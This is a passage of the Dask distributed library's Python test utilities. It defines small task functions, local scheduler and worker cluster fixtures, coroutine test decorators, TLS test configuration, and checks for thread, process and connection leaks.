"""
if module._old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug
def inc(x):
return x + 1
def dec(x):
return x - 1
def mul(x, y):
return x * y
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise RuntimeError("hello!")
def double(x):
return x * 2
def slowinc(x, delay=0.02):
sleep(delay)
return x + 1
def slowdec(x, delay=0.02):
sleep(delay)
return x - 1
def slowdouble(x, delay=0.02):
sleep(delay)
return 2 * x
def randominc(x, scale=1):
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y, delay=0.02):
sleep(delay)
return x + y
def slowsum(seq, delay=0.02):
sleep(delay)
return sum(seq)
def slowidentity(*args, **kwargs):
delay = kwargs.get("delay", 0.02)
sleep(delay)
if len(args) == 1:
return args[0]
else:
return args
class _UnhashableCallable:
# FIXME https://github.com/python/mypy/issues/4266
__hash__ = None # type: ignore
def __call__(self, x):
return x + 1
def run_for(duration, timer=time):
"""
Burn CPU for *duration* seconds.
"""
deadline = timer() + duration
while timer() <= deadline:
pass
# This dict grows at every varying() invocation
_varying_dict: defaultdict[str, int] = defaultdict(int)
_varying_key_gen = count()
class _ModuleSlot:
def __init__(self, modname, slotname):
self.modname = modname
self.slotname = slotname
def get(self):
return getattr(sys.modules[self.modname], self.slotname)
def varying(items):
"""
Return a function that returns a result (or raises an exception)
from *items* at each call.
"""
# cloudpickle would serialize the *values* of all globals
# used by *func* below, so we can't use `global <something>`.
# Instead look up the module by name to get the original namespace
# and not a copy.
slot = _ModuleSlot(__name__, "_varying_dict")
key = next(_varying_key_gen)
def func():
dct = slot.get()
i = dct[key]
if i == len(items):
raise IndexError
else:
x = items[i]
dct[key] = i + 1
if isinstance(x, Exception):
raise x
else:
return x
return func
def map_varying(itemslists):
"""
Like *varying*, but return the full specification for a map() call
on multiple items lists.
"""
def apply(func, *args, **kwargs):
return func(*args, **kwargs)
return apply, list(map(varying, itemslists))
async def geninc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
async def asyncinc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
_readone_queues: dict[Any, asyncio.Queue] = {}
async def readone(comm):
"""
Read one message at a time from a comm that reads lists of
messages.
"""
try:
q = _readone_queues[comm]
except KeyError:
q = _readone_queues[comm] = asyncio.Queue()
async def background_read():
while True:
try:
messages = await comm.read()
except CommClosedError:
break
for msg in messages:
q.put_nowait(msg)
q.put_nowait(None)
del _readone_queues[comm]
background_read()
msg = await q.get()
if msg is None:
raise CommClosedError
else:
return msg
def run_scheduler(q, nputs, config, port=0, **kwargs):
with dask.config.set(config):
from distributed import Scheduler
# On Python 2.7 and Unix, fork() is used to spawn child processes,
# so avoid inheriting the parent's IO loop.
with pristine_loop() as loop:
async def _():
scheduler = await Scheduler(
validate=True, host="127.0.0.1", port=port, **kwargs
)
for i in range(nputs):
q.put(scheduler.address)
await scheduler.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_worker(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
from distributed import Worker
reset_logger_locks()
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Worker(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_nanny(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Nanny(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
@contextmanager
def check_active_rpc(loop, active_rpc_timeout=1):
active_before = set(rpc.active)
yield
# Some streams can take a bit of time to notice their peer
# has closed, and keep a coroutine (*) waiting for a CommClosedError
# before calling close_rpc() after a CommClosedError.
# This would happen especially if a non-localhost address is used,
# as Nanny does.
# (*) (example: gather_from_workers())
def fail():
pytest.fail(
"some RPCs left active by test: %s" % (set(rpc.active) - active_before)
)
async def wait():
await async_wait_for(
lambda: len(set(rpc.active) - active_before) == 0,
timeout=active_rpc_timeout,
fail_func=fail,
)
loop.run_sync(wait)
@pytest.fixture
def cluster_fixture(loop):
with cluster() as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def s(cluster_fixture):
scheduler, workers = cluster_fixture
return scheduler
@pytest.fixture
def a(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[0]
@pytest.fixture
def b(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[1]
@pytest.fixture
def client(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
# Compatibility. A lot of tests simply use `c` as fixture name
c = client
@pytest.fixture
def client_secondary(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@contextmanager
def tls_cluster_context(
worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs
):
security = security or tls_only_security()
worker_kwargs = assoc(worker_kwargs or {}, "security", security)
scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security)
with cluster(
worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs
) as (s, workers):
yield s, workers
@pytest.fixture
def tls_cluster(loop, security):
with tls_cluster_context(security=security) as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def tls_client(tls_cluster, loop, security):
s, workers = tls_cluster
with Client(s["address"], security=security, loop=loop) as client:
yield client
@pytest.fixture
def security():
return tls_only_security()
@contextmanager
def cluster(
nworkers=2,
nanny=False,
worker_kwargs={},
active_rpc_timeout=10,
disconnect_timeout=20,
scheduler_kwargs={},
config={},
):
ws = weakref.WeakSet()
enable_proctitle_on_children()
with clean(timeout=active_rpc_timeout, threads=False) as loop:
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
# The scheduler queue will receive the scheduler's address
scheduler_q = mp_context.Queue()
# Launch scheduler
scheduler = mp_context.Process(
name="Dask cluster test: Scheduler",
target=run_scheduler,
args=(scheduler_q, nworkers + 1, config),
kwargs=scheduler_kwargs,
)
ws.add(scheduler)
scheduler.daemon = True
scheduler.start()
# Launch workers
workers = []
for i in range(nworkers):
q = mp_context.Queue()
fn = "_test_worker-%s" % uuid.uuid4()
kwargs = merge(
{
"nthreads": 1,
"local_directory": fn,
"memory_limit": system.MEMORY_LIMIT,
},
worker_kwargs,
)
proc = mp_context.Process(
name="Dask cluster test: Worker",
target=_run_worker,
args=(q, scheduler_q, config),
kwargs=kwargs,
)
ws.add(proc)
workers.append({"proc": proc, "queue": q, "dir": fn})
for worker in workers:
worker["proc"].start()
try:
for worker in workers:
worker["address"] = worker["queue"].get(timeout=5)
except queue.Empty:
pytest.xfail("Worker failed to start in test")
saddr = scheduler_q.get()
start = time()
try:
try:
security = scheduler_kwargs["security"]
rpc_kwargs = {"connection_args": security.get_connection_args("client")}
except KeyError:
rpc_kwargs = {}
with rpc(saddr, **rpc_kwargs) as s:
while True:
nthreads = loop.run_sync(s.ncores)
if len(nthreads) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
# avoid sending processes down to function
yield {"address": saddr}, [
{"address": w["address"], "proc": weakref.ref(w["proc"])}
for w in workers
]
finally:
logger.debug("Closing out test cluster")
loop.run_sync(
lambda: disconnect_all(
[w["address"] for w in workers],
timeout=disconnect_timeout,
rpc_kwargs=rpc_kwargs,
)
)
loop.run_sync(
lambda: disconnect(
saddr, timeout=disconnect_timeout, rpc_kwargs=rpc_kwargs
)
)
scheduler.terminate()
scheduler_q.close()
scheduler_q._reader.close()
scheduler_q._writer.close()
for w in workers:
w["proc"].terminate()
w["queue"].close()
w["queue"]._reader.close()
w["queue"]._writer.close()
scheduler.join(2)
del scheduler
for proc in [w["proc"] for w in workers]:
proc.join(timeout=30)
with suppress(UnboundLocalError):
del worker, w, proc
del workers[:]
for fn in glob("_test_worker-*"):
with suppress(OSError):
shutil.rmtree(fn)
try:
client = default_client()
except ValueError:
pass
else:
client.close()
start = time()
while any(proc.is_alive() for proc in ws):
text = str(list(ws))
sleep(0.2)
assert time() < start + 5, ("Workers still around after five seconds", text)
async def disconnect(addr, timeout=3, rpc_kwargs=None):
rpc_kwargs = rpc_kwargs or {}
async def do_disconnect():
with rpc(addr, **rpc_kwargs) as w:
# If the worker was killed hard (e.g. sigterm) during test runtime,
# we do not know at this point and may not be able to connect
with suppress(EnvironmentError, CommClosedError):
# Do not request a reply since comms will be closed by the
# worker before a reply can be made and we will always trigger
# the timeout
await w.terminate(reply=False)
await asyncio.wait_for(do_disconnect(), timeout=timeout)
async def disconnect_all(addresses, timeout=3, rpc_kwargs=None):
await asyncio.gather(*(disconnect(addr, timeout, rpc_kwargs) for addr in addresses))
def gen_test(timeout: float = _TEST_TIMEOUT) -> Callable[[Callable], Callable]:
"""Coroutine test
@pytest.mark.parametrize("param", [1, 2, 3])
@gen_test(timeout=5)
async def test_foo(param)
await ... # use tornado coroutines
@gen_test(timeout=5)
async def test_foo():
await ... # use tornado coroutines
"""
assert timeout, (
"timeout should always be set and it should be smaller than the global one from"
"pytest-timeout"
)
def _(func):
def test_func(*args, **kwargs):
with clean() as loop:
injected_func = functools.partial(func, *args, **kwargs)
if iscoroutinefunction(func):
cor = injected_func
else:
cor = gen.coroutine(injected_func)
loop.run_sync(cor, timeout=timeout)
# Patch the signature so pytest can inject fixtures
test_func.__signature__ = inspect.signature(func)
return test_func
return _
async def start_cluster(
nthreads: list[tuple[str, int] | tuple[str, int, dict]],
scheduler_addr: str,
loop: IOLoop,
security: Security | dict[str, Any] | None = None,
Worker: type[ServerNode] = Worker,
scheduler_kwargs: dict[str, Any] = {},
worker_kwargs: dict[str, Any] = {},
) -> tuple[Scheduler, list[ServerNode]]:
s = await Scheduler(
loop=loop,
validate=True,
security=security,
port=0,
host=scheduler_addr,
**scheduler_kwargs,
)
workers = [
Worker(
s.address,
nthreads=ncore[1],
name=i,
security=security,
loop=loop,
validate=True,
host=ncore[0],
**(
merge(worker_kwargs, ncore[2]) # type: ignore
if len(ncore) > 2
else worker_kwargs
),
)
for i, ncore in enumerate(nthreads)
]
await asyncio.gather(*workers)
start = time()
while (
len(s.workers) < len(nthreads)
or any(ws.status != Status.running for ws in s.workers.values())
or any(comm.comm is None for comm in s.stream_comms.values())
):
await asyncio.sleep(0.01)
if time() > start + 30:
await asyncio.gather(*(w.close(timeout=1) for w in workers))
await s.close(fast=True)
raise TimeoutError("Cluster creation timeout")
return s, workers
async def end_cluster(s, workers):
logger.debug("Closing out test cluster")
async def end_worker(w):
with suppress(TimeoutError, CommClosedError, EnvironmentError):
await w.close(report=False)
await asyncio.gather(*(end_worker(w) for w in workers))
await s.close() # wait until scheduler stops completely
s.stop()
def gen_cluster(
nthreads: list[tuple[str, int] | tuple[str, int, dict]] = [
("127.0.0.1", 1),
("127.0.0.1", 2),
],
scheduler="127.0.0.1",
timeout: float = _TEST_TIMEOUT,
security: Security | dict[str, Any] | None = None,
Worker: type[ServerNode] = Worker,
client: bool = False,
scheduler_kwargs: dict[str, Any] = {},
worker_kwargs: dict[str, Any] = {},
client_kwargs: dict[str, Any] = {},
active_rpc_timeout: float = 1,
config: dict[str, Any] = {},
clean_kwargs: dict[str, Any] = {},
allow_unclosed: bool = False,
cluster_dump_directory: str | Literal[False] = "test_cluster_dump",
) -> Callable[[Callable], Callable]:
from distributed import Client
""" Coroutine test with small cluster
@gen_cluster()
async def test_foo(scheduler, worker1, worker2):
await ... # use tornado coroutines
@pytest.mark.parametrize("param", [1, 2, 3])
@gen_cluster()
async def test_foo(scheduler, worker1, worker2, param):
await ... # use tornado coroutines
@gen_cluster()
async def test_foo(scheduler, worker1, worker2, pytest_fixture_a, pytest_fixture_b):
await ... # use tornado coroutines
See also:
start
end
"""
assert timeout, (
"timeout should always be set and it should be smaller than the global one from"
"pytest-timeout"
)
scheduler_kwargs = merge(
{"dashboard": False, "dashboard_address": ":0"}, scheduler_kwargs
)
worker_kwargs = merge(
{"memory_limit": system.MEMORY_LIMIT, "death_timeout": 15}, worker_kwargs
)
def _(func):
if not iscoroutinefunction(func):
raise RuntimeError("gen_cluster only works for coroutine functions.")
@functools.wraps(func)
def test_func(*outer_args, **kwargs):
result = None
workers = []
with clean(timeout=active_rpc_timeout, **clean_kwargs) as loop:
async def coro():
with dask.config.set(config):
s = False
for _ in range(60):
try:
s, ws = await start_cluster(
nthreads,
scheduler,
loop,
security=security,
Worker=Worker,
scheduler_kwargs=scheduler_kwargs,
worker_kwargs=worker_kwargs,
)
except Exception as e:
logger.error(
"Failed to start gen_cluster: "
f"{e.__class__.__name__}: {e}; retrying",
exc_info=True,
)
await asyncio.sleep(1)
else:
workers[:] = ws
args = [s] + workers
break
if s is False:
raise Exception("Could not start cluster")
if client:
c = await Client(
s.address,
loop=loop,
security=security,
asynchronous=True,
**client_kwargs,
)
args = [c] + args
try:
coro = func(*args, *outer_args, **kwargs)
task = asyncio.create_task(coro)
coro2 = asyncio.wait_for(asyncio.shield(task), timeout)
result = await coro2
if s.validate:
s.validate_state()
except asyncio.TimeoutError:
assert task
buffer = io.StringIO()
# This stack indicates where the coro/test is suspended
task.print_stack(file=buffer)
if cluster_dump_directory:
await dump_cluster_state(
s,
ws,
output_dir=cluster_dump_directory,
func_name=func.__name__,
)
task.cancel()
while not task.cancelled():
await asyncio.sleep(0.01)
# Remove as much of the traceback as possible; it's
# uninteresting boilerplate from utils_test and asyncio and
# not from the code being tested.
raise TimeoutError(
f"Test timeout after {timeout}s.\n"
"========== Test stack trace starts here ==========\n"
f"{buffer.getvalue()}"
) from None
except pytest.xfail.Exception:
raise
except Exception:
if cluster_dump_directory and not has_pytestmark(
test_func, "xfail"
):
await dump_cluster_state(
s,
ws,
output_dir=cluster_dump_directory,
func_name=func.__name__,
)
raise
finally:
if client and c.status not in ("closing", "closed"):
await c._close(fast=s.status == Status.closed)
await end_cluster(s, workers)
await asyncio.wait_for(cleanup_global_workers(), 1)
try:
c = await default_client()
except ValueError:
pass
else:
await c._close(fast=True)
def get_unclosed():
return [c for c in Comm._instances if not c.closed()] + [
c
for c in _global_clients.values()
if c.status != "closed"
]
try:
start = time()
while time() < start + 60:
gc.collect()
if not get_unclosed():
break
await asyncio.sleep(0.05)
else:
if allow_unclosed:
print(f"Unclosed Comms: {get_unclosed()}")
else:
raise RuntimeError("Unclosed Comms", get_unclosed())
finally:
Comm._instances.clear()
_global_clients.clear()
return result
result = loop.run_sync(
coro, timeout=timeout * 2 if timeout else timeout
)
for w in workers:
if getattr(w, "data", None):
try:
w.data.clear()
except OSError:
# zict backends can fail if their storage directory
# was already removed
pass
del w.data
return result
# Patch the signature so pytest can inject fixtures
orig_sig = inspect.signature(func)
args = [None] * (1 + len(nthreads)) # scheduler, *workers
if client:
args.insert(0, None)
bound = orig_sig.bind_partial(*args)
test_func.__signature__ = orig_sig.replace(
parameters=[
p
for name, p in orig_sig.parameters.items()
if name not in bound.arguments
]
)
return test_func
return _
async def dump_cluster_state(
s: Scheduler, ws: list[ServerNode], output_dir: str, func_name: str
) -> None:
"""A variant of Client.dump_cluster_state, which does not rely on any of the below
to work:
- Having a client at all
- Client->Scheduler comms
- Scheduler->Worker comms (unless using Nannies)
"""
scheduler_info = s._to_dict()
workers_info: dict[str, Any]
versions_info = version_module.get_versions()
if not ws or isinstance(ws[0], Worker):
workers_info = {w.address: w._to_dict() for w in ws}
else:
workers_info = await s.broadcast(msg={"op": "dump_state"}, on_error="return")
workers_info = {
k: repr(v) if isinstance(v, Exception) else v
for k, v in workers_info.items()
}
state = {
"scheduler": scheduler_info,
"workers": workers_info,
"versions": versions_info,
}
os.makedirs(output_dir, exist_ok=True)
fname = os.path.join(output_dir, func_name) + ".yaml"
with open(fname, "w") as fh:
yaml.safe_dump(state, fh) # Automatically convert tuples to lists
print(f"Dumped cluster state to {fname}")
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
def _terminate_process(proc):
if proc.poll() is None:
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
proc.wait(30)
finally:
# Make sure we don't leave the process lingering around
with suppress(OSError):
proc.kill()
@contextmanager
def popen(args, **kwargs):
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.PIPE
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
dump_stdout = False
args = list(args)
if sys.platform.startswith("win"):
args[0] = os.path.join(sys.prefix, "Scripts", args[0])
else:
args[0] = os.path.join(
os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0]
)
proc = subprocess.Popen(args, **kwargs)
try:
yield proc
except Exception:
dump_stdout = True
raise
finally:
try:
_terminate_process(proc)
finally:
# XXX Also dump stdout if return code != 0 ?
out, err = proc.communicate()
if dump_stdout:
print("\n\nPrint from stderr\n %s\n=================\n" % args[0][0])
print(err.decode())
print("\n\nPrint from stdout\n=================\n")
print(out.decode())
def wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail(f"condition not reached until {timeout} seconds")
async def async_wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
await asyncio.sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail(f"condition not reached until {timeout} seconds")
@memoize
def has_ipv6():
"""
Return whether IPv6 is locally functional. This doesn't guarantee IPv6
is properly configured outside of localhost.
"""
if os.getenv("DISABLE_IPV6") == "1":
return False
serv = cli = None
try:
serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
serv.bind(("::", 0))
serv.listen(5)
cli = socket.create_connection(serv.getsockname()[:2])
return True
except OSError:
return False
finally:
if cli is not None:
cli.close()
if serv is not None:
serv.close()
if has_ipv6():
def requires_ipv6(test_func):
return test_func
else:
requires_ipv6 = pytest.mark.skip("ipv6 required")
async def assert_can_connect(addr, timeout=0.5, **kwargs):
"""
Check that it is possible to connect to the distributed *addr*
within the given *timeout*.
"""
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_cannot_connect(
addr, timeout=0.5, exception_class=EnvironmentError, **kwargs
):
"""
Check that it is impossible to connect to the distributed *addr*
within the given *timeout*.
"""
with pytest.raises(exception_class):
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_can_connect_from_everywhere_4_6(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 and IPv6 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_can_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_4(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_cannot_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_cannot_connect(
"%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs
),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_4(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv4 addresses.
"""
futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, **kwargs)]
if get_ip() != "127.0.0.1": # No outside IPv4 connectivity?
futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs)]
if has_ipv6():
futures += [
assert_cannot_connect("tcp://[::1]:%d" % port, **kwargs),
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_6(port, **kwargs):
"""
Check that the local *port* is reachable from all IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_6(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
]
if get_ipv6() != "::1": # No outside IPv6 connectivity?
futures += [
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs)
]
await asyncio.gather(*futures)
@contextmanager
def captured_logger(logger, level=logging.INFO, propagate=None):
"""Capture output from the given Logger."""
if isinstance(logger, str):
logger = logging.getLogger(logger)
orig_level = logger.level
orig_handlers = logger.handlers[:]
if propagate is not None:
orig_propagate = logger.propagate
logger.propagate = propagate
sio = io.StringIO()
logger.handlers[:] = [logging.StreamHandler(sio)]
logger.setLevel(level)
try:
yield sio
finally:
logger.handlers[:] = orig_handlers
logger.setLevel(orig_level)
if propagate is not None:
logger.propagate = orig_propagate
@contextmanager
def captured_handler(handler):
"""Capture output from the given logging.StreamHandler."""
assert isinstance(handler, logging.StreamHandler)
orig_stream = handler.stream
handler.stream = io.StringIO()
try:
yield handler.stream
finally:
handler.stream = orig_stream
@contextmanager
def new_config(new_config):
"""
Temporarily change configuration dictionary.
"""
from .config import defaults
config = dask.config.config
orig_config = copy.deepcopy(config)
try:
config.clear()
config.update(copy.deepcopy(defaults))
dask.config.update(config, new_config)
initialize_logging(config)
yield
finally:
config.clear()
config.update(orig_config)
initialize_logging(config)
@contextmanager
def new_environment(changes):
saved_environ = os.environ.copy()
os.environ.update(changes)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
@contextmanager
def new_config_file(c):
"""
Temporarily change configuration file to match dictionary *c*.
"""
import yaml
old_file = os.environ.get("DASK_CONFIG")
fd, path = tempfile.mkstemp(prefix="dask-config")
try:
with os.fdopen(fd, "w") as f:
f.write(yaml.dump(c))
os.environ["DASK_CONFIG"] = path
try:
yield
finally:
if old_file:
os.environ["DASK_CONFIG"] = old_file
else:
del os.environ["DASK_CONFIG"]
finally:
os.remove(path)
certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests"))
def get_cert(filename):
"""
Get the path to one of the test TLS certificates.
"""
path = os.path.join(certs_dir, filename)
assert os.path.exists(path), path
return path
def tls_config():
"""
A functional TLS configuration with our test certs.
"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
return {
"distributed": {
"comm": {
"tls": {
"ca-file": ca_file,
"client": {"cert": keycert},
"scheduler": {"cert": keycert},
"worker": {"cert": keycert},
}
}
}
}
def tls_only_config():
"""
A functional TLS configuration with our test certs, disallowing
plain TCP communications.
"""
c = tls_config()
c["distributed"]["comm"]["require-encryption"] = True
return c
def tls_security():
"""
A Security object with proper TLS configuration.
"""
with new_config(tls_config()):
sec = Security()
return sec
def tls_only_security():
"""
A Security object with proper TLS configuration and disallowing plain
TCP communications.
"""
with new_config(tls_only_config()):
sec = Security()
assert sec.require_encryption
return sec
def get_server_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def get_client_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def bump_rlimit(limit, desired):
resource = pytest.importorskip("resource")
try:
soft, hard = resource.getrlimit(limit)
if soft < desired:
resource.setrlimit(limit, (desired, max(hard, desired)))
except Exception as e:
pytest.skip(f"rlimit too low ({soft}) and can't be increased: {e}")
def gen_tls_cluster(**kwargs):
kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)])
return gen_cluster(
scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs
)
@contextmanager
def save_sys_modules():
old_modules = sys.modules
old_path = sys.path
try:
yield
finally:
for i, elem in enumerate(sys.path):
if elem not in old_path:
del sys.path[i]
for elem in sys.modules.keys():
if elem not in old_modules:
del sys.modules[elem]
@contextmanager
def check_thread_leak():
"""Context manager to ensure we haven't leaked any threads"""
# "TCP-Executor" threads are never stopped once they are started
BaseTCPConnector.warmup()
active_threads_start = threading.enumerate()
yield
start = time()
while True:
bad_threads = [
thread
for thread in threading.enumerate()
if thread not in active_threads_start
# FIXME this looks like a genuine leak that needs fixing
and "watch message queue" not in thread.name
]
if not bad_threads:
break
else:
sleep(0.01)
if time() > start + 5:
# Raise an error with information about leaked threads
from distributed import profile
bad_thread = bad_threads[0]
call_stacks = profile.call_stack(sys._current_frames()[bad_thread.ident])
assert False, (bad_thread, call_stacks)
def wait_active_children(timeout: float) -> list[multiprocessing.Process]:
"""Wait until timeout for mp_context.active_children() to terminate.
Return list of active subprocesses after the timeout expired.
"""
t0 = time()
while True:
# Do not sample the subprocesses once at the beginning with
# `for proc in mp_context.active_children: ...`, assume instead that new
# children processes may be spawned before the timeout expires.
children = mp_context.active_children()
if not children:
return []
join_timeout = timeout - time() + t0
if join_timeout <= 0:
return children
children[0].join(timeout=join_timeout)
def term_or_kill_active_children(timeout: float) -> None:
"""Send SIGTERM to mp_context.active_children(), wait up to 3 seconds for processes
to die, then send SIGKILL to the survivors
"""
children = mp_context.active_children()
for proc in children:
proc.terminate()
children = wait_active_children(timeout=timeout)
for proc in children:
proc.kill()
children = wait_active_children(timeout=30)
if children: # pragma: nocover
logger.warning("Leaked unkillable children processes: %s", children)
# It should be impossible to ignore SIGKILL on Linux/MacOSX
assert WINDOWS
@contextmanager
def check_process_leak(
check: bool = True, check_timeout: float = 40, term_timeout: float = 3
):
"""Terminate any currently-running subprocesses at both the beginning and end of this context
Parameters
----------
check : bool, optional
If True, raise AssertionError if any processes survive at the exit
check_timeout: float, optional
Wait up to these many seconds for subprocesses to terminate before failing
term_timeout: float, optional
After sending SIGTERM to a subprocess, wait up to these many seconds before
sending SIGKILL
"""
term_or_kill_active_children(timeout=term_timeout)
try:
yield
if check:
children = wait_active_children(timeout=check_timeout)
assert not children, f"Test leaked subprocesses: {children}"
finally:
term_or_kill_active_children(timeout=term_timeout)
@contextmanager
def check_instances():
Client._instances.clear()
Worker._instances.clear()
Scheduler._instances.clear()
SpecCluster._instances.clear()
Worker._initialized_clients.clear()
# assert all(n.status == "closed" for n in Nanny._instances), {
# n: n.status for n in Nanny._instances
# }
Nanny._instances.clear()
_global_clients.clear()
Comm._instances.clear()
yield
start = time()
while set(_global_clients):
sleep(0.1)
assert time() < start + 10
_global_clients.clear()
for w in Worker._instances:
with suppress(RuntimeError): # closed IOLoop
w.loop.add_callback(w.close, report=False, executor_wait=False)
if w.status in Status.ANY_RUNNING:
w.loop.add_callback(w.close)
Worker._instances.clear()
start = time()
while any(c.status != "closed" for c in Worker._initialized_clients):
sleep(0.1)
assert time() < start + 10
Worker._initialized_clients.clear()
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
sleep(0.1)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
print("Unclosed Comms", L)
# raise ValueError("Unclosed Comms", L)
assert all(
n.status == Status.closed or n.status == Status.init for n in Nanny._instances
), {n: n.status for n in Nanny._instances}
# assert not list(SpecCluster._instances) # TODO
assert all(c.status == Status.closed for c in SpecCluster._instances), list(
SpecCluster._instances
)
SpecCluster._instances.clear()
Nanny._instances.clear()
DequeHandler.clear_all_instances()
@contextmanager
def clean(threads=not WINDOWS, instances=True, timeout=1, processes=True):
with check_thread_leak() if threads else nullcontext():
with pristine_loop() as loop:
with check_process_leak(check=processes):
with check_instances() if instances else nullcontext():
with check_active_rpc(loop, timeout):
reset_config()
dask.config.set({"distributed.comm.timeouts.connect": "5s"})
# Restore default logging levels
# XXX use pytest hooks/fixtures instead?
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield loop
@pytest.fixture
def cleanup():
with clean():
yield
class TaskStateMetadataPlugin(WorkerPlugin):
"""WorkPlugin to populate TaskState.metadata"""
def setup(self, worker):
self.worker = worker
def transition(self, key, start, finish, **kwargs):
ts = self.worker.tasks[key]
if start == "ready" and finish == "executing":
ts.metadata["start_time"] = time()
elif start == "executing" and finish == "memory":
ts.metadata["stop_time"] = time()
class LockedComm(TCP):
def __init__(self, comm, read_event, read_queue, write_event, write_queue):
self.write_event = write_event
self.write_queue = write_queue
self.read_event = read_event
self.read_queue = read_queue
self.comm = comm
assert isinstance(comm, TCP)
def __getattr__(self, name):
return getattr(self.comm, name)
async def write(self, msg, serializers=None, on_error="message"):
if self.write_queue:
await self.write_queue.put((self.comm.peer_address, msg))
if self.write_event:
await self.write_event.wait()
return await self.comm.write(msg, serializers=serializers, on_error=on_error)
